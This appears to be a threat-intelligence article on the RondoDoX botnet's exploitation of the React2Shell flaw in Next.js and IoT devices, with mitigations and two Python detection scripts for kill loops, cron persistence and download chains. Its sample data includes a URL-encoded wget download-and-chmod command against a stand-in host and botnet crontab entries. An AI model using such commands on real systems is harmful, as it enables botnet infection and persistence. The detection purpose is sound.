In late 2025, a fast‑evolving campaign exposed how quickly modern botnets adapt to newly disclosed web flaws. RondoDoX, a cross‑architecture botnet active since early 2025, began by probing n‑day vulnerabilities in web apps and IoT gear—then weaponized the critical “React2Shell” RCE in React Server Components/Next.js to push miners and bot clients at enterprise scale. The result: hourly exploitation waves against Next.js Server Actions and internet‑facing routers/cameras, with payloads compiled for x86, x86_64, MIPS, ARM, and PowerPC, plus persistence and malware‑killing safeguards to monopolize host resources.
This article breaks down what RondoDoX is, how the React2Shell exploit works, the three operational phases CloudSEK observed, and the controls CISOs/SOCs should implement immediately to contain risk across web and IoT estates.
What Is the RondoDoX Botnet?
RondoDoX is a large‑scale IoT + web exploitation botnet first documented publicly in 2025. Earlier waves targeted flaws in DVRs and routers (e.g., TBK DVRs, Four‑Faith routers) to enroll devices and mimic gaming/VPN traffic for evasion; later, operators expanded to Next.js servers as soon as React2Shell (CVE‑2025‑55182) was disclosed.
By December 2025, CloudSEK’s analysis of exposed C2 logs over nine months (Mar–Dec 2025) confirmed RondoDoX’s multi‑stage evolution, automated scanning, hourly deployment attempts, and ten+ botnet variants delivering coin miners, Mirai‑based payloads, and a support framework that terminates rival malware and enforces persistence via cron.
React2Shell (CVE‑2025‑55182 / CVE‑2025‑66478): The Critical RCE Enabler
React2Shell is a CVSS 10.0 pre‑auth RCE in React Server Components (RSC), inherited by Next.js App Router implementations (tracked downstream as CVE‑2025‑66478, later aligned to the same root flaw). It abuses insecure Flight protocol deserialization—a single malicious HTTP request against server function endpoints (or default RSC paths) can achieve remote code execution.
- Disclosure timeline: Private report (Nov 29, 2025), public advisory (Dec 3–4, 2025), rapid real‑world exploitation within days; working PoCs appeared quickly.
- Affected stacks: React 19.0–19.2, Next.js 15.x/16.x (and certain 14.x canary builds), plus other RSC framework implementations. Patches released mid‑December.
- Scale of exposure: Tens of thousands of internet‑exposed assets vulnerable by late December per Shadowserver telemetry.
Why attackers love it: Default configs are exposed; pre‑auth RCE via a single request; easy automation; rapid bot deployment chains after initial execution.
RondoDoX Campaign Phases (Mar–Dec 2025)
CloudSEK’s C2‑log analysis correlates three distinct phases of the RondoDoX operation:
- Phase 1 – Manual Recon & Testing (Mar–Apr 2025)
- Sporadic, hands‑on vulnerability testing (SQLi, command injection, WebLogic deserialization).
- Phase 2 – Automated Web Exploitation (Apr–Jun 2025)
- Daily scans across WordPress, Drupal, Struts2 and early IoT probes; expanded webshell/miner deployment.
- Phase 3 – Hourly Botnet Deployment (Jul–Dec 2025)
- Industrialized bot enrollment with hourly waves; December pivot to React2Shell for Next.js servers; 40+ exploit attempts in six days recorded by researchers.
Operational breadth: At least six C2 servers, ten+ malware variants, and consistent deployment across multiple CPU architectures—all evidenced in logs and multi‑source reporting.
Attack Chain: From Blind RCE to Persistent Control
Step 1 – Target identification & blind RCE probes
Automated scans identify Next.js apps exposing RSC endpoints; blind RCE testing confirms exploitability (e.g., Dec 8–13, 2025 timeline).
Step 2 – Initial payload (ELF binary) deployment
Exploit triggers shell/Node commands to download ELF payloads from active C2 infrastructure using wget/curl/tftp/ftp for resilience.
Step 3 – Persistence & “resource monopoly”
A support framework (“/nuts/bolts”) enforces host dominance:
- Cron persistence via /etc/crontab
- Process policing: scans /proc and kills non‑whitelisted processes every ~45 seconds
- Rival cleanup: removes competing miners/botnets, Docker artifacts, prior cron jobs
These behaviors free CPU/GPU for cryptominers and stabilize bot operations (“/nuts/poop” miner, Mirai‑variant “/nuts/x86”).
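The host-monopoly behaviour described in Step 3 (cron persistence plus a periodic process-kill loop) is also what the Expert Insights section later calls a strong detection anchor. The Python below is an added example written for this article, not CloudSEK's tooling or any code from the botnet: it parses a constructed sample of process-termination telemetry and flags any killer process whose kills recur at roughly 45-second intervals, then reviews a constructed /etc/crontab for entries that run from temp directories or the /nuts/ path, or on a one-minute schedule. The telemetry line format, the thresholds, and the path list are assumptions to adapt to what your EDR actually exports.

```python
import re
from collections import defaultdict
from statistics import median

# Constructed sample of process-termination telemetry (not real EDR output).
# Format per line: "<epoch seconds> <killer pid> <killer exe> <target pid> <signal>"
SAMPLE_KILL_EVENTS = """\
1765000000 4242 /nuts/bolts 5101 SIGKILL
1765000012 1337 /usr/lib/systemd/systemd 2001 SIGTERM
1765000045 4242 /nuts/bolts 5133 SIGKILL
1765000090 4242 /nuts/bolts 5140 SIGKILL
1765000136 4242 /nuts/bolts 5177 SIGKILL
1765000181 4242 /nuts/bolts 5190 SIGKILL
1765000600 1337 /usr/lib/systemd/systemd 2050 SIGTERM
"""

# Constructed /etc/crontab: two benign lines plus two entries of the kind the
# article describes (support framework on a one-minute schedule, binary in /tmp).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /nuts/bolts >/dev/null 2>&1
@reboot root /tmp/.cache/miner >/dev/null 2>&1
"""


def parse_kill_events(text):
    """Parse the constructed format into (ts, killer_pid, killer_exe, target_pid, signal)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, kpid, kexe, tpid, sig = line.split()
        events.append((int(ts), int(kpid), kexe, int(tpid), sig))
    return events


def find_kill_loops(events, expected_period=45, tolerance=5, min_kills=4):
    """Flag killer processes whose kills recur at ~expected_period seconds.

    Events are grouped by (killer pid, exe); a killer is reported when at least
    min_kills - 1 of the gaps between its kills fall within tolerance of the period.
    """
    by_killer = defaultdict(list)
    for ts, kpid, kexe, _tpid, _sig in events:
        by_killer[(kpid, kexe)].append(ts)
    findings = []
    for (kpid, kexe), stamps in by_killer.items():
        if len(stamps) < min_kills:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        periodic = sum(1 for g in gaps if abs(g - expected_period) <= tolerance)
        if periodic >= min_kills - 1:
            findings.append({"pid": kpid, "exe": kexe, "kills": len(stamps),
                             "median_gap": median(gaps)})
    return findings


# Locations a legitimate cron job rarely executes from; /nuts/ is the
# support-framework directory named in the article. Extend for your estate.
SUSPICIOUS_PATH = re.compile(r"(^|[\s=])(/tmp/|/var/tmp/|/dev/shm/|/nuts/)")
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")


def suspicious_cron_entries(crontab_text, allow_substrings=("run-parts",)):
    """Return (line number, reason, line) for crontab entries worth an analyst's review."""
    hits = []
    for lineno, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        if any(s in line for s in allow_substrings):
            continue
        reasons = []
        if SUSPICIOUS_PATH.search(line):
            reasons.append("temp/unusual path")
        if EVERY_MINUTE.match(line):
            reasons.append("runs every minute")
        if reasons:
            hits.append((lineno, ", ".join(reasons), line))
    return hits


if __name__ == "__main__":
    for f in find_kill_loops(parse_kill_events(SAMPLE_KILL_EVENTS)):
        print(f"kill loop: pid {f['pid']} ({f['exe']}) {f['kills']} kills, "
              f"median gap {f['median_gap']}s")
    for lineno, reason, line in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"crontab line {lineno}: {reason}: {line}")
```

On the sample data the script reports one kill loop (pid 4242, /nuts/bolts, five kills at a median gap of 45 s) and two crontab entries. Keying the loop detector on the killer rather than the victims matters: the framework kills a different non-whitelisted process each cycle, so per-victim counting would never cross a threshold.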
Step 4 – Cross‑architecture propagation
Payload kits for x86, x86_64, MIPS, ARM, PowerPC ensure coverage of servers, routers, cameras, and embedded systems—typical of modern Mirai‑lineage botnets.
Real‑World Scale & Collateral
- IoT waves: Hourly enrollments hitting Linksys, Wavlink and other brands; Next.js servers breached via React2Shell in parallel.
- Global exposure: ~90k+ RSC‑exposed assets vulnerable by Dec 31, 2025, with heavy concentration in the U.S. and exposure in Germany, France, India.
- Multi‑vector lineage: RondoDoX previously abused CVE‑2024‑3721, CVE‑2024‑12856, CVE‑2025‑24893 (XWiki RCE), showcasing a broad n‑day exploit shotgun approach.
Common Mistakes & Misconceptions
- “We don’t use Server Functions, so we’re safe.”
  False. Apps supporting RSC can still be exploitable via default endpoints; patching is required.
- “Our WAF blocks this by default.”
  WAF helps, but pre‑auth deserialization RCE at framework endpoints often bypasses generic signatures; version upgrades are the primary fix.
- “IoT isn’t part of our app risk.”
  RondoDoX chains app and IoT weaknesses; compromised web servers can enable lateral movement to routers/cameras and vice versa.
Best Practices & Actionable Steps (Enterprise)
Immediate (72 hours)
- Patch/Upgrade
- React/Next.js to patched releases (Next.js 15.0.5/15.1.9/…/16.0.7; React 19.0.1/19.1.2/19.2.1). If on affected canary lines, apply fixed canaries or downgrade to the latest 14.x stable if advised.
- Rotate Secrets
- Per Next.js advisory, rotate credentials for apps online and unpatched during Dec 4, 2025 window.
- Block known C2s
- Apply perimeter firewall/IP blacklists for RondoDoX infrastructure reported by analysts; maintain deny lists as IOCs update.
- Harden IoT
- Disable remote management, update firmware, and isolate devices into dedicated VLANs; remove default creds.
Short Term (2–4 weeks)
- WAF/Reverse‑proxy hardening for RSC/Next.js routes, with strict HTTP verb/body validation on known endpoints (e.g., /_next/flight).
- EDR/telemetry rules to flag cron changes, high‑frequency process kill loops, and miner binaries in temp directories.
- Network segmentation between web tiers and IoT/OT; enforce egress restrictions from IoT to the internet.
- Hunt for wget/curl/tftp/ftp chains in web server logs; correlate with suspicious downloads from RondoDoX‑like hosts.
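The log hunt in the last item can be scripted. The Python below is an added example for this article, not code from CloudSEK or any vendor product: it parses constructed combined-format access log lines, flags requests whose decoded URL names wget/curl/tftp/ftp together with shell chaining or an embedded download URL, records the hosts those chains try to fetch from, and correlates per source IP with requests to RSC routes. The log regex, the RSC route list (seeded with the /_next/flight path mentioned above), and the sample lines are assumptions; the addresses are from documentation ranges.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access log lines (not captured traffic). Source
# and payload-host addresses use the 198.51.100.0/24 and 203.0.113.0/24
# documentation ranges; /nuts/x86 is the Mirai-variant name from the article.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [09/Dec/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Dec/2025:10:00:05 +0000] "POST /_next/flight HTTP/1.1" 500 0 "-" "python-requests/2.31"
198.51.100.7 - - [09/Dec/2025:10:00:09 +0000] "POST / HTTP/1.1" 200 0 "-" "python-requests/2.31"
198.51.100.7 - - [09/Dec/2025:10:00:12 +0000] "GET /cgi-bin/luci?cmd=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F198.51.100.99%2Fnuts%2Fx86%3Bchmod%20%2Bx%20x86 HTTP/1.1" 404 0 "-" "curl/8.0"
203.0.113.22 - - [09/Dec/2025:10:01:00 +0000] "GET /docs/curl-vs-wget HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
DOWNLOAD_TOOL = re.compile(r"\b(wget|curl|tftp|ftp)\b")
SHELL_CHAIN = re.compile(r"[;|`]|&&|\$\(")
URL_HOST = re.compile(r"https?://([^/\s;|&'\"]+)")
# RSC routes to watch. /_next/flight is the endpoint named in the article; the
# list is an assumption to replace with the routes your deployment serves.
RSC_ROUTES = ("/_next/flight",)


def parse_access_log(text):
    """Parse log lines into dicts; unparseable lines are skipped, paths are URL-decoded."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            d = m.groupdict()
            d["decoded_path"] = unquote_plus(d["path"])
            entries.append(d)
    return entries


def download_chain_hits(entries):
    """Flag requests whose decoded path names a download tool AND either chains
    shell commands or embeds a URL. A bare word match such as /docs/curl-vs-wget
    is deliberately not enough, which keeps ordinary content paths out of the hunt.
    Only the request path is inspected, so a curl/ User-Agent alone is not a hit."""
    hits = []
    for e in entries:
        p = e["decoded_path"]
        tool = DOWNLOAD_TOOL.search(p)
        hosts = URL_HOST.findall(p)
        if tool and (SHELL_CHAIN.search(p) or hosts):
            hits.append({"ip": e["ip"], "ts": e["ts"], "tool": tool.group(1),
                         "download_hosts": hosts, "request": p})
    return hits


def correlate(entries):
    """Per source IP: RSC-route requests, download-chain requests, and the hosts
    those chains fetched from. Only IPs with at least one indicator are returned."""
    report = {}

    def bucket(ip):
        return report.setdefault(ip, {"rsc_probes": 0, "chains": 0, "download_hosts": set()})

    for e in entries:
        route = e["decoded_path"].split("?", 1)[0]
        if any(route.startswith(r) for r in RSC_ROUTES):
            bucket(e["ip"])["rsc_probes"] += 1
    for h in download_chain_hits(entries):
        b = bucket(h["ip"])
        b["chains"] += 1
        b["download_hosts"].update(h["download_hosts"])
    return report


if __name__ == "__main__":
    for ip, r in correlate(parse_access_log(SAMPLE_ACCESS_LOG)).items():
        print(f"{ip}: rsc_probes={r['rsc_probes']} chains={r['chains']} "
              f"download_hosts={sorted(r['download_hosts'])}")
```

On the sample, only 198.51.100.7 is reported: one request to an RSC route and one wget chain pulling from 198.51.100.99. The extracted download hosts are what you feed into the egress-block and threat-intel correlation steps; the IP that merely browsed a page about curl and wget generates nothing.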
Medium Term (60–90 days)
- Secure build/runtime posture: pin to patched frameworks; CI/CD gates to reject vulnerable RSC packages.
- Tabletop exercises focused on pre‑auth RCE in app frameworks + IoT propagation; drill botnet eviction steps.
- Threat intel ingestion: subscribe to feeds tracking React2Shell and botnet infrastructure (Shadowserver, vendor advisories).
Tools, Frameworks & Standards
- NIST SP 800‑53 / SP 800‑207 (Zero Trust): Segment IoT; continuous verification for untrusted app endpoints.
- CISA KEV: React2Shell listed; prioritize patch SLAs.
- MITRE ATT&CK (Enterprise/ICS): Map to Initial Access (Exploit public‑facing app), Execution (Command/Scripting), Persistence (cron), Defense Evasion (kill processes).
Risk–Impact Analysis (C‑Level Summary)
| Vector | Likelihood (next 3–6 mo) | Impact | Primary Controls | Residual Risk |
|---|---|---|---|---|
| React2Shell RCE (Next.js) | High | Full server compromise; miner/bot deployment | Version upgrades, WAF tuning, secret rotation | New RCEs in RSC ecosystem possible |
| IoT router/camera compromise | High | DDoS node enrollment; lateral movement | VLAN isolation, firmware updates, disable remote mgmt | Supply‑chain firmware gaps persist |
| Process‑monopoly persistence | Medium | Host lock‑in; resource hijack | EDR detection of cron/process kill loops; miner signatures | Variants mutate faster than AV sigs |
| Multi‑C2 agility | Medium–High | Rapid infra retooling; evasion | IOC blocking + TI automation; egress filtering | Botnet rotates infra frequently |
Visual-Friendly Quick Checklist
- Patch Next.js/React (now).
- Rotate secrets if exposed.
- Block known RondoDoX C2s.
- Segment IoT into VLANs; update firmware.
- Monitor temp dirs & cron modifications; hunt for miners.
- WAF rules for RSC/Next.js endpoints.
Expert Insights
- Pre‑auth RCE in frameworks (like React2Shell) collapses traditional controls—no credentials, and often a single HTTP request to compromise. Framework patching beats perimeter controls.
- Botnet “host monopoly” patterns (cron + process‑kill loops) are strong detection anchors; tune EDR to flag 45‑sec kill cadence and miner paths.
- IoT is not incidental: campaigns chain web and device vectors; policy‑level isolation is essential.
FAQs (Schema‑friendly)
Q1. What exactly is React2Shell and why does it matter?
A. It’s a CVSS 10.0 pre‑auth RCE in React Server Components, inherited by Next.js. It enables code execution via one crafted request, making it ideal for botnet automation. Patch immediately.
Q2. How did RondoDoX use React2Shell?
A. After scanning for Next.js servers (Dec 8–13), operators deployed ELF payloads, miners, and a Mirai variant, enforcing persistence via cron and killing rival malware.
Q3. Are non‑Next.js React apps affected?
A. Any app/framework implementing RSC/Flight may be exposed until patched (e.g., React Router RSC, Waku, RedwoodSDK).
Q4. Which IoT devices were targeted?
A. Routers/cameras from brands like Linksys, Wavlink, D‑LINK, Four‑Faith, TBK DVRs, among others, across multiple campaigns and CVEs.
Q5. What persistence indicators should we hunt?
A. New entries in /etc/crontab, periodic process‑kill loops, miners in /tmp or /var/tmp, and wget/curl/tftp/ftp download chains from suspicious hosts.
Conclusion
The RondoDoX botnet demonstrates how quickly adversaries can weaponize critical pre‑auth RCEs like React2Shell—shifting from routine web/IoT probing to hourly deployments and host‑monopolizing persistence. For security leaders, the response must be framework‑driven and infrastructure‑wide: patch React/Next.js, rotate secrets, segment IoT, tighten WAFs, and monitor cron/process behaviors that signal botnet tenancy.